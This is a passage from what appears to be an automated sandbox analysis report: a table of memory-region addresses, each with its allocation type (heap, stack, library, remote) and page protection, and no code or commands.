page read and write
|
||
|
26B70000
|
trusted library allocation
|
page read and write
|
||
|
6A41000
|
remote allocation
|
page execute and read and write
|
||
|
740F000
|
stack
|
page read and write
|
||
|
26BB0000
|
trusted library allocation
|
page read and write
|
||
|
8980000
|
trusted library allocation
|
page read and write
|
||
|
26B60000
|
trusted library allocation
|
page read and write
|
||
|
33B2000
|
heap
|
page read and write
|
||
|
243A7FCC000
|
heap
|
page read and write
|
||
|
1EA79433000
|
heap
|
page read and write
|
||
|
4DF0000
|
trusted library allocation
|
page read and write
|
||
|
1EA77435000
|
heap
|
page read and write
|
||
|
3190000
|
heap
|
page read and write
|
||
|
1EA791E0000
|
heap
|
page read and write
|
||
|
4C41000
|
remote allocation
|
page execute and read and write
|
||
|
243C072E000
|
heap
|
page read and write
|
||
|
8BE0000
|
direct allocation
|
page read and write
|
||
|
1EA77380000
|
remote allocation
|
page read and write
|
||
|
1EA792C8000
|
heap
|
page read and write
|
||
|
243C07BC000
|
heap
|
page read and write
|
||
|
26660000
|
trusted library allocation
|
page read and write
|
||
|
555B000
|
stack
|
page read and write
|
||
|
243A7F40000
|
heap
|
page execute and read and write
|
||
|
3355000
|
heap
|
page read and write
|
||
|
7445000
|
heap
|
page execute and read and write
|
||
|
8A17000
|
heap
|
page read and write
|
||
|
25549000
|
trusted library allocation
|
page read and write
|
||
|
8CE0000
|
heap
|
page read and write
|
||
|
1EA79156000
|
heap
|
page read and write
|
||
|
26B90000
|
trusted library allocation
|
page read and write
|
||
|
26B80000
|
trusted library allocation
|
page read and write
|
||
|
243A9F41000
|
trusted library allocation
|
page read and write
|
||
|
28CF000
|
unkown
|
page read and write
|
||
|
8C2E000
|
stack
|
page read and write
|
||
|
323B000
|
stack
|
page read and write
|
||
|
26B80000
|
trusted library allocation
|
page read and write
|
||
|
1EA790BB000
|
heap
|
page read and write
|
||
|
24230000
|
direct allocation
|
page read and write
|
||
|
26B60000
|
trusted library allocation
|
page read and write
|
||
|
D431000
|
direct allocation
|
page execute and read and write
|
||
|
8A70000
|
direct allocation
|
page read and write
|
||
|
73CE000
|
stack
|
page read and write
|
||
|
26B70000
|
trusted library allocation
|
page read and write
|
||
|
26B50000
|
trusted library allocation
|
page read and write
|
||
|
1EA791A2000
|
heap
|
page read and write
|
||
|
1EA791D1000
|
heap
|
page read and write
|
||
|
26B80000
|
trusted library allocation
|
page read and write
|
||
|
244F0000
|
heap
|
page read and write
|
||
|
1EA791CD000
|
heap
|
page read and write
|
||
|
243C0196000
|
heap
|
page read and write
|
||
|
4DC0000
|
trusted library allocation
|
page read and write
|
||
|
1EA7919A000
|
heap
|
page read and write
|
||
|
5020000
|
heap
|
page read and write
|
||
|
245B0000
|
trusted library allocation
|
page read and write
|
||
|
75C0000
|
direct allocation
|
page read and write
|
||
|
1EA79010000
|
heap
|
page read and write
|
||
|
1EA79046000
|
heap
|
page read and write
|
||
|
5641000
|
remote allocation
|
page execute and read and write
|
||
|
1EA790AA000
|
heap
|
page read and write
|
||
|
8B6B000
|
stack
|
page read and write
|
||
|
26ABE000
|
stack
|
page read and write
|
||
|
1EA79033000
|
heap
|
page read and write
|
||
|
7FFD3477D000
|
trusted library allocation
|
page execute and read and write
|
||
|
27520000
|
trusted library allocation
|
page read and write
|
||
|
3292000
|
heap
|
page read and write
|
||
|
1EA7903B000
|
heap
|
page read and write
|
||
|
4EA0000
|
heap
|
page readonly
|
||
|
24591000
|
trusted library allocation
|
page read and write
|
||
|
7FFD3482C000
|
trusted library allocation
|
page execute and read and write
|
||
|
35D8000
|
heap
|
page read and write
|
||
|
7FFD34AC0000
|
trusted library allocation
|
page read and write
|
||
|
26B90000
|
trusted library allocation
|
page read and write
|
||
|
4DC4000
|
trusted library allocation
|
page read and write
|
||
|
A42000
|
trusted library allocation
|
page read and write
|
||
|
26B80000
|
trusted library allocation
|
page read and write
|
||
|
7FFD34A10000
|
trusted library allocation
|
page read and write
|
||
|
1EA791D1000
|
heap
|
page read and write
|
||
|
4EE0000
|
heap
|
page read and write
|
||
|
1EA7901F000
|
heap
|
page read and write
|
||
|
1EA79033000
|
heap
|
page read and write
|
||
|
1EA792A8000
|
heap
|
page read and write
|
||
|
4E9F000
|
stack
|
page read and write
|
||
|
2ACF000
|
stack
|
page read and write
|
||
|
8BEC000
|
stack
|
page read and write
|
||
|
243A64E0000
|
trusted library allocation
|
page read and write
|
||
|
891D000
|
stack
|
page read and write
|
||
|
8B19000
|
heap
|
page read and write
|
||
|
244A6000
|
trusted library allocation
|
page read and write
|
||
|
1EA79220000
|
heap
|
page read and write
|
||
|
26B60000
|
trusted library allocation
|
page read and write
|
||
|
1EA79081000
|
heap
|
page read and write
|
||
|
26B80000
|
trusted library allocation
|
page read and write
|
||
|
26BA0000
|
trusted library allocation
|
page read and write
|
||
|
358E000
|
stack
|
page read and write
|
||
|
26B94000
|
trusted library allocation
|
page read and write
|
||
|
1EA791BF000
|
heap
|
page read and write
|
||
|
3540000
|
heap
|
page read and write
|
||
|
1EA79264000
|
heap
|
page read and write
|
||
|
1EA79065000
|
heap
|
page read and write
|
||
|
26B3E000
|
stack
|
page read and write
|
||
|
7FFD349D0000
|
trusted library allocation
|
page read and write
|
||
|
1EA792DC000
|
heap
|
page read and write
|
||
|
33A4000
|
heap
|
page read and write
|
||
|
243F8000
|
trusted library allocation
|
page read and write
|
||
|
2751E000
|
stack
|
page read and write
|
||
|
26BB0000
|
trusted library allocation
|
page read and write
|
||
|
1EA791A2000
|
heap
|
page read and write
|
||
|
26C30000
|
trusted library allocation
|
page read and write
|
||
|
1EA79458000
|
heap
|
page read and write
|
||
|
2458F000
|
trusted library allocation
|
page read and write
|
||
|
24521000
|
trusted library allocation
|
page read and write
|
||
|
7B5E000
|
heap
|
page read and write
|
||
|
4F9A000
|
stack
|
page read and write
|
||
|
26AFE000
|
stack
|
page read and write
|
||
|
1FEC6670000
|
heap
|
page read and write
|
||
|
244AE000
|
trusted library allocation
|
page read and write
|
||
|
3370000
|
heap
|
page read and write
|
||
|
7FFD349B0000
|
trusted library allocation
|
page read and write
|
||
|
759B000
|
stack
|
page read and write
|
||
|
3240000
|
heap
|
page read and write
|
||
|
4FCE000
|
stack
|
page read and write
|
||
|
23F1D000
|
stack
|
page read and write
|
||
|
244A0000
|
trusted library allocation
|
page read and write
|
||
|
1EA79030000
|
heap
|
page read and write
|
||
|
5C4B5FF000
|
unkown
|
page read and write
|
||
|
26680000
|
trusted library allocation
|
page read and write
|
||
|
1EA79285000
|
heap
|
page read and write
|
||
|
1EA7943B000
|
heap
|
page read and write
|
||
|
26BA0000
|
trusted library allocation
|
page read and write
|
||
|
1EA79086000
|
heap
|
page read and write
|
||
|
23FDE000
|
stack
|
page read and write
|
||
|
8B02000
|
heap
|
page read and write
|
||
|
1EA770DF000
|
heap
|
page read and write
|
||
|
26B70000
|
trusted library allocation
|
page read and write
|
||
|
1EA791DB000
|
heap
|
page read and write
|
||
|
1EA791E0000
|
heap
|
page read and write
|
||
|
1EA7921D000
|
heap
|
page read and write
|
||
|
1EA792CD000
|
heap
|
page read and write
|
||
|
4DC3000
|
trusted library allocation
|
page execute and read and write
|
||
|
6041000
|
remote allocation
|
page execute and read and write
|
||
|
1EA79046000
|
heap
|
page read and write
|
||
|
7FFD34AA0000
|
trusted library allocation
|
page read and write
|
||
|
4DF2000
|
trusted library allocation
|
page read and write
|
||
|
243E0000
|
heap
|
page read and write
|
||
|
2730000
|
heap
|
page read and write
|
||
|
26B70000
|
trusted library allocation
|
page read and write
|
||
|
7C80000
|
trusted library allocation
|
page read and write
|
||
|
243A9FD7000
|
trusted library allocation
|
page read and write
|
||
|
305B000
|
stack
|
page read and write
|
||
|
7FFD34A90000
|
trusted library allocation
|
page read and write
|
||
|
7B4C000
|
heap
|
page read and write
|
||
|
7E50000
|
trusted library allocation
|
page read and write
|
||
|
3430000
|
heap
|
page read and write
|
||
|
26B70000
|
trusted library allocation
|
page read and write
|
||
|
4DEA000
|
trusted library allocation
|
page execute and read and write
|
||
|
1EA7901C000
|
heap
|
page read and write
|
||
|
8AA8000
|
heap
|
page read and write
|
||
|
24510000
|
heap
|
page execute and read and write
|
||
|
1EA79094000
|
heap
|
page read and write
|
||
|
26B60000
|
trusted library allocation
|
page read and write
|
||
|
26B50000
|
trusted library allocation
|
page read and write
|
||
|
243A7FA0000
|
heap
|
page read and write
|
||
|
748E000
|
stack
|
page read and write
|
||
|
7EEB000
|
stack
|
page read and write
|
||
|
26BB0000
|
trusted library allocation
|
page read and write
|
||
|
8B23000
|
heap
|
page read and write
|
||
|
3477000
|
heap
|
page read and write
|
||
|
1EA791CD000
|
heap
|
page read and write
|
||
|
243C075E000
|
heap
|
page read and write
|
||
|
1EA79044000
|
heap
|
page read and write
|
||
|
26B70000
|
trusted library allocation
|
page read and write
|
||
|
7A9B27F000
|
stack
|
page read and write
|
||
|
1EA7942F000
|
heap
|
page read and write
|
||
|
75E0000
|
direct allocation
|
page read and write
|
||
|
9650000
|
direct allocation
|
page execute and read and write
|
||
|
243A6890000
|
heap
|
page read and write
|
||
|
3350000
|
heap
|
page read and write
|
||
|
1EA796B1000
|
heap
|
page read and write
|
||
|
2655B000
|
heap
|
page read and write
|
||
|
265DD000
|
heap
|
page read and write
|
||
|
22AD000
|
stack
|
page read and write
|
||
|
1EA7927D000
|
heap
|
page read and write
|
||
|
7C98000
|
trusted library allocation
|
page read and write
|
||
|
5825000
|
trusted library allocation
|
page read and write
|
||
|
1EA793B7000
|
heap
|
page read and write
|
||
|
1EA79099000
|
heap
|
page read and write
|
||
|
7FFD34826000
|
trusted library allocation
|
page read and write
|
||
|
244B2000
|
trusted library allocation
|
page read and write
|
||
|
243A8191000
|
trusted library allocation
|
page read and write
|
||
|
26BA0000
|
trusted library allocation
|
page read and write
|
||
|
53ED000
|
stack
|
page read and write
|
||
|
546E000
|
stack
|
page read and write
|
||
|
9BD84FE000
|
stack
|
page read and write
|
||
|
8BAE000
|
stack
|
page read and write
|
||
|
1EA79520000
|
heap
|
page read and write
|
||
|
26B60000
|
trusted library allocation
|
page read and write
|
||
|
1EA79036000
|
heap
|
page read and write
|
||
|
26BA0000
|
trusted library allocation
|
page read and write
|
||
|
243A6553000
|
heap
|
page read and write
|
||
|
1EA791DB000
|
heap
|
page read and write
|
||
|
1EA79244000
|
heap
|
page read and write
|
||
|
7B7E000
|
heap
|
page read and write
|
||
|
2407F000
|
stack
|
page read and write
|
||
|
243A8002000
|
heap
|
page read and write
|
||
|
26C20000
|
trusted library allocation
|
page read and write
|
||
|
3580000
|
heap
|
page read and write
|
||
|
243A8614000
|
trusted library allocation
|
page read and write
|
||
|
A3A000
|
trusted library allocation
|
page execute and read and write
|
||
|
1EA790B9000
|
heap
|
page read and write
|
||
|
8CE7000
|
heap
|
page read and write
|
||
|
8A10000
|
heap
|
page read and write
|
||
|
55B247E000
|
stack
|
page read and write
|
||
|
7DE0000
|
trusted library allocation
|
page read and write
|
||
|
381000
|
unkown
|
page execute read
|
||
|
26BA0000
|
trusted library allocation
|
page read and write
|
||
|
1EA79044000
|
heap
|
page read and write
|
||
|
7C50000
|
trusted library allocation
|
page read and write
|
||
|
8B26000
|
heap
|
page read and write
|
||
|
344F000
|
stack
|
page read and write
|
||
|
26B60000
|
trusted library allocation
|
page read and write
|
||
|
7FFD34A20000
|
trusted library allocation
|
page read and write
|
||
|
55B29BE000
|
stack
|
page read and write
|
||
|
1EA79165000
|
heap
|
page read and write
|
||
|
A00000
|
trusted library allocation
|
page read and write
|
||
|
23FF0000
|
trusted library allocation
|
page read and write
|
||
|
26B60000
|
trusted library allocation
|
page read and write
|
||
|
26B70000
|
trusted library allocation
|
page read and write
|
||
|
8CBE000
|
stack
|
page read and write
|
||
|
272E000
|
unkown
|
page read and write
|
||
|
243C0740000
|
heap
|
page read and write
|
||
|
7FFD34970000
|
trusted library allocation
|
page read and write
|
||
|
1EA770EF000
|
heap
|
page read and write
|
||
|
243A7FB2000
|
heap
|
page read and write
|
||
|
274DD000
|
stack
|
page read and write
|
||
|
7E80000
|
trusted library allocation
|
page read and write
|
||
|
77A0000
|
heap
|
page read and write
|
||
|
381000
|
unkown
|
page execute read
|
||
|
3237000
|
stack
|
page read and write
|
||
|
7FFD34990000
|
trusted library allocation
|
page read and write
|
||
|
334F000
|
stack
|
page read and write
|
||
|
8B66000
|
heap
|
page read and write
|
||
|
26BA0000
|
trusted library allocation
|
page read and write
|
||
|
265DE000
|
heap
|
page read and write
|
||
|
26B73000
|
trusted library allocation
|
page read and write
|
||
|
26BA0000
|
trusted library allocation
|
page read and write
|
||
|
A30000
|
trusted library allocation
|
page read and write
|
||
|
26B60000
|
trusted library allocation
|
page read and write
|
||
|
1EA7946E000
|
heap
|
page read and write
|
||
|
243A9F7D000
|
trusted library allocation
|
page read and write
|
||
|
8B2C000
|
stack
|
page read and write
|
||
|
243A9F95000
|
trusted library allocation
|
page read and write
|
||
|
39D000
|
unkown
|
page readonly
|
||
|
7EA0000
|
trusted library allocation
|
page read and write
|
||
|
26B50000
|
trusted library allocation
|
page read and write
|
||
|
26BA0000
|
trusted library allocation
|
page read and write
|
||
|
26B80000
|
trusted library allocation
|
page read and write
|
||
|
7FFD34774000
|
trusted library allocation
|
page read and write
|
||
|
1EA79046000
|
heap
|
page read and write
|
||
|
515E000
|
stack
|
page read and write
|
||
|
7C7A000
|
trusted library allocation
|
page read and write
|
||
|
7DD0000
|
trusted library allocation
|
page execute and read and write
|
||
|
265A0000
|
heap
|
page read and write
|
||
|
7FFD34856000
|
trusted library allocation
|
page execute and read and write
|
||
|
7C60000
|
trusted library allocation
|
page read and write
|
||
|
243C05E0000
|
heap
|
page execute and read and write
|
||
|
55B2A3E000
|
stack
|
page read and write
|
||
|
7FFD34780000
|
trusted library allocation
|
page read and write
|
||
|
387000
|
unkown
|
page readonly
|
||
|
26BA0000
|
trusted library allocation
|
page read and write
|
||
|
26BB0000
|
trusted library allocation
|
page read and write
|
||
|
232D3610000
|
heap
|
page read and write
|
||
|
245A9000
|
trusted library allocation
|
page read and write
|
||
|
4DE0000
|
trusted library allocation
|
page read and write
|
||
|
1EA77280000
|
heap
|
page read and write
|
||
|
1EA79430000
|
heap
|
page read and write
|
||
|
26BA0000
|
trusted library allocation
|
page read and write
|
||
|
26B40000
|
trusted library allocation
|
page read and write
|
||
|
1EA77430000
|
heap
|
page read and write
|
||
|
243A8000000
|
heap
|
page read and write
|
||
|
26B60000
|
trusted library allocation
|
page read and write
|
||
|
A50000
|
trusted library allocation
|
page execute and read and write
|
||
|
232D3510000
|
heap
|
page read and write
|
||
|
1EA79410000
|
heap
|
page read and write
|
||
|
1EA7946E000
|
heap
|
page read and write
|
||
|
25521000
|
trusted library allocation
|
page read and write
|
||
|
1EA7905F000
|
heap
|
page read and write
|
||
|
1EA79295000
|
heap
|
page read and write
|
||
|
26C10000
|
trusted library allocation
|
page execute and read and write
|
||
|
7B4F000
|
heap
|
page read and write
|
||
|
7FFD34A40000
|
trusted library allocation
|
page read and write
|
||
|
1EA7917B000
|
heap
|
page read and write
|
||
|
26BB0000
|
trusted library allocation
|
page read and write
|
||
|
23F9D000
|
stack
|
page read and write
|
||
|
243A8073000
|
heap
|
page read and write
|
||
|
26B70000
|
trusted library allocation
|
page read and write
|
||
|
1EA790B9000
|
heap
|
page read and write
|
||
|
243A6500000
|
heap
|
page read and write
|
||
|
8841000
|
remote allocation
|
page execute and read and write
|
||
|
1EA77191000
|
heap
|
page read and write
|
||
|
50DA000
|
stack
|
page read and write
|
||
|
501E000
|
stack
|
page read and write
|
||
|
243A8065000
|
heap
|
page read and write
|
||
|
357E000
|
stack
|
page read and write
|
||
|
1EA7743E000
|
heap
|
page read and write
|
||
|
26B70000
|
trusted library allocation
|
page read and write
|
||
|
1EA79052000
|
heap
|
page read and write
|
||
|
243A95EA000
|
trusted library allocation
|
page read and write
|
||
|
26BB0000
|
trusted library allocation
|
page read and write
|
||
|
1EA790B9000
|
heap
|
page read and write
|
||
|
26B80000
|
trusted library allocation
|
page read and write
|
||
|
1EA791CD000
|
heap
|
page read and write
|
||
|
26690000
|
heap
|
page execute and read and write
|
||
|
55B24FC000
|
stack
|
page read and write
|
||
|
39D000
|
unkown
|
page readonly
|
||
|
7FFD34A80000
|
trusted library allocation
|
page read and write
|
||
|
1EA79183000
|
heap
|
page read and write
|
||
|
26C40000
|
trusted library allocation
|
page read and write
|
||
|
1EA793B6000
|
heap
|
page read and write
|
||
|
1EA79096000
|
heap
|
page read and write
|
||
|
1EA7917D000
|
heap
|
page read and write
|
||
|
1EA79411000
|
heap
|
page read and write
|
||
|
1EA79439000
|
heap
|
page read and write
|
||
|
A2D000
|
trusted library allocation
|
page execute and read and write
|
||
|
26BB0000
|
trusted library allocation
|
page read and write
|
||
|
51D0000
|
heap
|
page read and write
|
||
|
232D38D5000
|
heap
|
page read and write
|
||
|
1EA792DC000
|
heap
|
page read and write
|
||
|
755D000
|
stack
|
page read and write
|
||
|
243A6430000
|
heap
|
page read and write
|
||
|
55B273F000
|
stack
|
page read and write
|
||
|
1EA7905E000
|
heap
|
page read and write
|
||
|
564F000
|
stack
|
page read and write
|
||
|
8880000
|
heap
|
page read and write
|
||
|
4DD9000
|
trusted library allocation
|
page read and write
|
||
|
3610000
|
heap
|
page read and write
|
||
|
243A8180000
|
heap
|
page read and write
|
||
|
8C90000
|
heap
|
page read and write
|
||
|
1EA790BB000
|
heap
|
page read and write
|
||
|
243A6593000
|
heap
|
page read and write
|
||
|
7C90000
|
trusted library allocation
|
page read and write
|
||
|
244CD000
|
trusted library allocation
|
page read and write
|
||
|
26B90000
|
trusted library allocation
|
page read and write
|
||
|
8B26000
|
heap
|
page read and write
|
||
|
7FFD34772000
|
trusted library allocation
|
page read and write
|
||
|
244AB000
|
trusted library allocation
|
page read and write
|
||
|
27520000
|
trusted library allocation
|
page read and write
|
||
|
243A8A23000
|
trusted library allocation
|
page read and write
|
||
|
574E000
|
stack
|
page read and write
|
||
|
1EA77165000
|
heap
|
page read and write
|
||
|
244BE000
|
trusted library allocation
|
page read and write
|
||
|
A45000
|
trusted library allocation
|
page execute and read and write
|
||
|
26B5D000
|
trusted library allocation
|
page read and write
|
||
|
7610000
|
direct allocation
|
page read and write
|
||
|
1EA77157000
|
heap
|
page read and write
|
||
|
26B60000
|
trusted library allocation
|
page read and write
|
||
|
243A7F47000
|
heap
|
page execute and read and write
|
||
|
1EA7901C000
|
heap
|
page read and write
|
||
|
26B50000
|
trusted library allocation
|
page read and write
|
||
|
1EA791E0000
|
heap
|
page read and write
|
||
|
509B000
|
stack
|
page read and write
|
||
|
243A801B000
|
heap
|
page read and write
|
||
|
1EA791BD000
|
heap
|
page read and write
|
||
|
39D000
|
unkown
|
page readonly
|
||
|
1EA791CD000
|
heap
|
page read and write
|
||
|
8B60000
|
heap
|
page read and write
|
||
|
26B60000
|
trusted library allocation
|
page read and write
|
||
|
1EA79011000
|
heap
|
page read and write
|
||
|
1EA7906A000
|
heap
|
page read and write
|
||
|
7E40000
|
trusted library allocation
|
page read and write
|
||
|
243A6549000
|
heap
|
page read and write
|
||
|
55B358E000
|
stack
|
page read and write
|
||
|
8EC0000
|
direct allocation
|
page read and write
|
||
|
2430E000
|
stack
|
page read and write
|
||
|
26B80000
|
trusted library allocation
|
page read and write
|
||
|
3294000
|
heap
|
page read and write
|
||
|
1EA790B4000
|
heap
|
page read and write
|
||
|
1EA791BA000
|
heap
|
page read and write
|
||
|
26B80000
|
trusted library allocation
|
page read and write
|
||
|
74CF000
|
stack
|
page read and write
|
||
|
1EA79121000
|
heap
|
page read and write
|
||
|
1EA791BA000
|
heap
|
page read and write
|
||
|
385000
|
unkown
|
page readonly
|
||
|
1EA7945A000
|
heap
|
page read and write
|
||
|
1EA770B0000
|
heap
|
page read and write
|
||
|
9BD80FE000
|
stack
|
page read and write
|
||
|
243A8684000
|
trusted library allocation
|
page read and write
|
||
|
1EA794C8000
|
heap
|
page read and write
|
||
|
8CE0000
|
heap
|
page read and write
|
||
|
320E000
|
stack
|
page read and write
|
||
|
89A0000
|
heap
|
page read and write
|
||
|
32C0000
|
heap
|
page read and write
|
||
|
7FFD34921000
|
trusted library allocation
|
page read and write
|
||
|
7FFD349A0000
|
trusted library allocation
|
page read and write
|
||
|
26C40000
|
trusted library allocation
|
page read and write
|
||
|
26BA0000
|
trusted library allocation
|
page read and write
|
||
|
24220000
|
direct allocation
|
page read and write
|
||
|
5167000
|
trusted library allocation
|
page read and write
|
||
|
243A64A0000
|
heap
|
page read and write
|
||
|
8BA0000
|
direct allocation
|
page read and write
|
||
|
A14000
|
trusted library allocation
|
page read and write
|
||
|
1EA792B8000
|
heap
|
page read and write
|
||
|
26BA0000
|
trusted library allocation
|
page read and write
|
||
|
26B80000
|
trusted library allocation
|
page read and write
|
||
|
26B90000
|
trusted library allocation
|
page read and write
|
||
|
A32000
|
trusted library allocation
|
page read and write
|
||
|
8970000
|
trusted library allocation
|
page execute and read and write
|
||
|
738E000
|
stack
|
page read and write
|
||
|
26B90000
|
trusted library allocation
|
page read and write
|
||
|
26B80000
|
trusted library allocation
|
page read and write
|
||
|
A36000
|
trusted library allocation
|
page execute and read and write
|
||
|
1EA7928D000
|
heap
|
page read and write
|
||
|
243A6895000
|
heap
|
page read and write
|
||
|
26B80000
|
trusted library allocation
|
page read and write
|
||
|
55B368B000
|
stack
|
page read and write
|
||
|
1EA791A2000
|
heap
|
page read and write
|
||
|
241CE000
|
stack
|
page read and write
|
||
|
26BA0000
|
trusted library allocation
|
page read and write
|
||
|
36C0000
|
heap
|
page read and write
|
||
|
1EA79144000
|
heap
|
page read and write
|
||
|
26C40000
|
trusted library allocation
|
page read and write
|
||
|
3690000
|
heap
|
page read and write
|
||
|
3600000
|
trusted library allocation
|
page read and write
|
||
|
25586000
|
trusted library allocation
|
page read and write
|
||
|
26BA0000
|
trusted library allocation
|
page read and write
|
||
|
1EA791D1000
|
heap
|
page read and write
|
||
|
1EA7958C000
|
heap
|
page read and write
|
||
|
3100000
|
heap
|
page read and write
|
||
|
26B70000
|
trusted library allocation
|
page read and write
|
||
|
586E000
|
trusted library allocation
|
page read and write
|
||
|
1EA791A2000
|
heap
|
page read and write
|
||
|
8CB0000
|
heap
|
page read and write
|
||
|
26B70000
|
trusted library allocation
|
page read and write
|
||
|
8A80000
|
direct allocation
|
page read and write
|
||
|
24190000
|
remote allocation
|
page read and write
|
||
|
4EC8000
|
trusted library allocation
|
page read and write
|
||
|
7EE20000
|
trusted library allocation
|
page execute and read and write
|
||
|
506A000
|
trusted library allocation
|
page read and write
|
||
|
1EA790B9000
|
heap
|
page read and write
|
||
|
7B5A000
|
heap
|
page read and write
|
||
|
4E5E000
|
stack
|
page read and write
|
||
|
26BD0000
|
trusted library allocation
|
page read and write
|
||
|
26C00000
|
trusted library allocation
|
page read and write
|
||
|
26B80000
|
trusted library allocation
|
page read and write
|
||
|
26A7D000
|
stack
|
page read and write
|
||
|
8C30000
|
trusted library allocation
|
page read and write
|
||
|
2653F000
|
heap
|
page read and write
|
||
|
3248000
|
heap
|
page read and write
|
||
|
1FEC64AA000
|
heap
|
page read and write
|
||
|
243A6551000
|
heap
|
page read and write
|
||
|
1EA7946E000
|
heap
|
page read and write
|
||
|
1EA7909E000
|
heap
|
page read and write
|
||
|
26BB0000
|
trusted library allocation
|
page read and write
|
||
|
8C97000
|
heap
|
page read and write
|
||
|
24190000
|
remote allocation
|
page read and write
|
||
|
1EA79014000
|
heap
|
page read and write
|
||
|
7FFD34980000
|
trusted library allocation
|
page read and write
|
||
|
7FFD34A00000
|
trusted library allocation
|
page read and write
|
||
|
7A9AF5C000
|
stack
|
page read and write
|
||
|
1EA79589000
|
heap
|
page read and write
|
||
|
1EA79163000
|
heap
|
page read and write
|
||
|
77B8000
|
heap
|
page read and write
|
||
|
24090000
|
heap
|
page read and write
|
||
|
243A862D000
|
trusted library allocation
|
page read and write
|
||
|
1EA7920E000
|
heap
|
page read and write
|
||
|
26BC0000
|
trusted library allocation
|
page read and write
|
||
|
232D35F0000
|
heap
|
page read and write
|
||
|
1EA7904A000
|
heap
|
page read and write
|
||
|
8877000
|
stack
|
page read and write
|
||
|
8B0E000
|
heap
|
page read and write
|
||
|
1EA7914F000
|
heap
|
page read and write
|
||
|
26BA0000
|
trusted library allocation
|
page read and write
|
||
|
7C10000
|
trusted library allocation
|
page read and write
|
||
|
1FEC6470000
|
heap
|
page read and write
|
||
|
1EA792C1000
|
heap
|
page read and write
|
||
|
265F7000
|
heap
|
page read and write
|
||
|
1EA770E0000
|
heap
|
page read and write
|
||
|
243B847A000
|
trusted library allocation
|
page read and write
|
||
|
89B0000
|
trusted library allocation
|
page execute and read and write
|
||
|
8C20000
|
direct allocation
|
page read and write
|
||
|
26B50000
|
trusted library allocation
|
page read and write
|
||
|
26B72000
|
trusted library allocation
|
page read and write
|
||
|
243A867F000
|
trusted library allocation
|
page read and write
|
||
|
7B19000
|
heap
|
page read and write
|
||
|
26B80000
|
trusted library allocation
|
page read and write
|
||
|
26BB0000
|
trusted library allocation
|
page read and write
|
||
|
1EA79044000
|
heap
|
page read and write
|
||
|
26B70000
|
trusted library allocation
|
page read and write
|
||
|
1EA79261000
|
heap
|
page read and write
|
||
|
330E000
|
stack
|
page read and write
|
||
|
26BB0000
|
trusted library allocation
|
page read and write
|
||
|
31A0000
|
heap
|
page read and write
|
||
|
895E000
|
stack
|
page read and write
|
||
|
56CC000
|
stack
|
page read and write
|
||
|
26B70000
|
trusted library allocation
|
page read and write
|
||
|
26B60000
|
trusted library allocation
|
page read and write
|
||
|
1EA79055000
|
heap
|
page read and write
|
||
|
7FFD34890000
|
trusted library allocation
|
page execute and read and write
|
||
|
55B257E000
|
stack
|
page read and write
|
||
|
1EA7946E000
|
heap
|
page read and write
|
||
|
4F5C000
|
stack
|
page read and write
|
||
|
1EA79062000
|
heap
|
page read and write
|
||
|
1EA792B5000
|
heap
|
page read and write
|
||
|
1EA79011000
|
heap
|
page read and write
|
||
|
7E10000
|
trusted library allocation
|
page read and write
|
||
|
1EA7920D000
|
heap
|
page read and write
|
||
|
243A650D000
|
heap
|
page read and write
|
||
|
8BD0000
|
direct allocation
|
page read and write
|
||
|
26BA0000
|
trusted library allocation
|
page read and write
|
||
|
26B50000
|
trusted library allocation
|
page read and write
|
||
|
35CF000
|
stack
|
page read and write
|
||
|
26B90000
|
trusted library allocation
|
page read and write
|
||
|
1EA79183000
|
heap
|
page read and write
|
||
|
26B71000
|
trusted library allocation
|
page read and write
|
||
|
380000
|
unkown
|
page readonly
|
||
|
26B60000
|
trusted library allocation
|
page read and write
|
||
|
8CDA000
|
heap
|
page read and write
|
||
|
26BA0000
|
trusted library allocation
|
page read and write
|
||
|
7B29000
|
heap
|
page read and write
|
||
|
243A7FA5000
|
heap
|
page read and write
|
||
|
1EA7941C000
|
heap
|
page read and write
|
||
|
8BC0000
|
direct allocation
|
page read and write
|
||
|
26B70000
|
trusted library allocation
|
page read and write
|
||
|
7FFD34820000
|
trusted library allocation
|
page read and write
|
||
|
243A7FB6000
|
heap
|
page read and write
|
||
|
26BB0000
|
trusted library allocation
|
page read and write
|
||
|
3620000
|
heap
|
page read and write
|
||
|
243A86DE000
|
trusted library allocation
|
page read and write
|
||
|
7FFD34A30000
|
trusted library allocation
|
page read and write
|
||
|
578F000
|
stack
|
page read and write
|
||
|
1EA79017000
|
heap
|
page read and write
|
||
|
1EA79027000
|
heap
|
page read and write
|
||
|
89D0000
|
trusted library allocation
|
page read and write
|
||
|
1EA7905A000
|
heap
|
page read and write
|
||
|
7600000
|
direct allocation
|
page read and write
|
||
|
76DE000
|
stack
|
page read and write
|
||
|
6021000
|
trusted library allocation
|
page read and write
|
||
|
1EA791CD000
|
heap
|
page read and write
|
||
|
3287000
|
heap
|
page read and write
|
||
|
24584000
|
trusted library allocation
|
page read and write
|
||
|
1EA7926C000
|
heap
|
page read and write
|
||
|
7B10000
|
heap
|
page read and write
|
||
|
26BA0000
|
trusted library allocation
|
page read and write
|
||
|
26B70000
|
trusted library allocation
|
page read and write
|
||
|
1EA79251000
|
heap
|
page read and write
|
||
|
7FFD34960000
|
trusted library allocation
|
page execute and read and write
|
||
|
243A8600000
|
trusted library allocation
|
page read and write
|
||
|
4E10000
|
trusted library allocation
|
page read and write
|
||
|
26B70000
|
trusted library allocation
|
page read and write
|
||
|
1EA7941F000
|
heap
|
page read and write
|
||
|
1EA791C0000
|
heap
|
page read and write
|
||
|
A13000
|
trusted library allocation
|
page execute and read and write
|
||
|
AC0000
|
heap
|
page read and write
|
||
|
7FFD34A60000
|
trusted library allocation
|
page read and write
|
||
|
8B68000
|
heap
|
page read and write
|
||
|
243A9F56000
|
trusted library allocation
|
page read and write
|
||
|
272A1000
|
heap
|
page read and write
|
||
|
26B50000
|
trusted library allocation
|
page read and write
|
||
|
8AE1000
|
heap
|
page read and write
|
||
|
2434F000
|
stack
|
page read and write
|
||
|
7A22000
|
heap
|
page read and write
|
||
|
1EA79036000
|
heap
|
page read and write
|
||
|
1EA79230000
|
heap
|
page read and write
|
||
|
7DF476D70000
|
trusted library allocation
|
page execute and read and write
|
||
|
1EA79179000
|
heap
|
page read and write
|
||
|
26BB0000
|
trusted library allocation
|
page read and write
|
||
|
1EA791D1000
|
heap
|
page read and write
|
||
|
26B80000
|
trusted library allocation
|
page read and write
|
||
|
26BE0000
|
trusted library allocation
|
page read and write
|
||
|
243A8A2F000
|
trusted library allocation
|
page read and write
|
||
|
1EA79183000
|
heap
|
page read and write
|
||
|
55DE000
|
stack
|
page read and write
|
||
|
26BA0000
|
trusted library allocation
|
page read and write
|
||
|
4F1C000
|
stack
|
page read and write
|
||
|
